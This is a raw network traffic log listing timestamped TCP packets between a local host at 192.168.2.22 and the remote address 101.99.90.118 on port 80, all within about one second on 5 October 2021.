Oct 5, 2021 22:18:04.567270994 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.567277908 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.567286015 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.568320036 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.568345070 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.568363905 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.568386078 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.568409920 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.568430901 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.568428993 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.568455935 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.568490982 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.568496943 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.568506956 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.568519115 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.568526030 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.568548918 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.568576097 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.568582058 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.568603039 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.568622112 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.568633080 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.568639994 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.568659067 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.568680048 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.570194960 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.666467905 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.666795969 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.744213104 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.744246006 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.744265079 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.744285107 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.744313002 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.744390011 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.744422913 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.744451046 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.744476080 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.744479895 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.744498968 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.744502068 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.744505882 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.744528055 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.744554043 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.744566917 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.744587898 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.744594097 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.744612932 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.745219946 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.745264053 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.745289087 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.745315075 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.745333910 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.745384932 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.745456934 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.745507956 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.745542049 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.745569944 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.745589972 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.745589972 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.745615005 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.745619059 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.745640993 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.745645046 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.745671034 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.745672941 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.745699883 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.745701075 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.745721102 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.745748997 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.746835947 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.746865988 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.746891975 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.746918917 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.746926069 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.746939898 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.746951103 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.746962070 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.746984959 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.747013092 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.747040987 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.747128963 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.747170925 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.747196913 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.747200012 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.747222900 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.747222900 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.747248888 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.747250080 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.747272968 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.747278929 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.747299910 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.747323990 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.748439074 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.748476982 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.748519897 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.748529911 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.748558998 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.748562098 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.748593092 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.748600960 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.748630047 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.748636961 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.748666048 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.748667955 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.748697996 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.748699903 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.748733044 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.748733997 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.748766899 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.748768091 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.748802900 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.748811960 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.748838902 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.748850107 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.748876095 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.748908997 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.749209881 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.749317884 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.749319077 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.749356985 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.749392986 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.749428034 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.749437094 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.749452114 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.749460936 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.749461889 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.749488115 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.749505997 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.749526024 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.749545097 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.749578953 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.749591112 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.749609947 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.749614954 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.749650002 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.749650955 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.749676943 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.749696970 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.749712944 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.749716997 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.749771118 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.754405975 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.837291002 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.837497950 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.926980019 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.927037001 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.927084923 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.927161932 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.927213907 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.927249908 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.927362919 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.927391052 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.927392006 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.927433014 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.927455902 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.927470922 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.927505970 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.927508116 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.927537918 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.927545071 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.927566051 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.927582979 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.927608013 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.927639961 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.928302050 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.928415060 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.928427935 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.928452969 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.928488016 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.928493023 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.928525925 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.928563118 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.928612947 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.928662062 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.928695917 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.928709030 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.928728104 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.928761959 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.928767920 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.928828001 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.928834915 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.928883076 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.928898096 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.928937912 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.928944111 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.928997040 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.929006100 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.929054022 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.929068089 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.929106951 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.929111958 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.929157019 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.929203033 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.929227114 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.929238081 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.929286003 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.929308891 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.929341078 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.929399967 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.929450989 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.929455996 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.929488897 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.929497004 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.929512024 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.929531097 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.929569006 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.929569960 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.929625988 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.929692030 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.929718971 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.929801941 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.929809093 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.930157900 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.932337999 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.932496071 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.932512999 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.932579994 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.932641029 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.932666063 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.932696104 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.932713032 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.932727098 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.932749987 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.932786942 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.932823896 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.932827950 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.932885885 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.932907104 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.932940960 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.932991982 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.932986975 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.933028936 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.933044910 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.933072090 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.933095932 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.933111906 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.933181047 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.933496952 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.933558941 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.933607101 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.933641911 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.933645964 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.933669090 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.933685064 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.933715105 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.933732033 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.933770895 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.933774948 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.933789015 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.933811903 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.933835030 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.933851004 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.933871031 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.933888912 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.933924913 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.933963060 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.933980942 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.933993101 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.934000015 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.934047937 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.934078932 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.934091091 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.934113026 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.934128046 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.934135914 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.934145927 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.934154034 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.934169054 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.934192896 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.934206963 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.934227943 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.934245110 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.934263945 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.934283972 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.934292078 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.934322119 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.934338093 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.934366941 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.934369087 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.934411049 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.934427023 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.934448004 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.934462070 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.934487104 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.934504032 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.934535980 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.940654993 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.941684008 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.008100986 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.008393049 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.109560966 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.109594107 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.109611988 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.109646082 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.109668016 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.109692097 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.109714985 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.109740973 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.109765053 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.109786987 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.109811068 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.109833002 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.109859943 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.109885931 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.109913111 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.110799074 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.110862970 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.110888958 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.110946894 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.110960960 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.110970020 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.110984087 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.110995054 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.111017942 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.111027002 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.111040115 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.111063004 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.111071110 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.111085892 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.111104965 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.111121893 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.111145020 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.111151934 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.111227989 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.111987114 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.112258911 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.112298965 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.112319946 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.112339973 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.112349987 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.112360001 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.112379074 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.112397909 CEST	49169	80	192.168.2.22	101.99.90.118
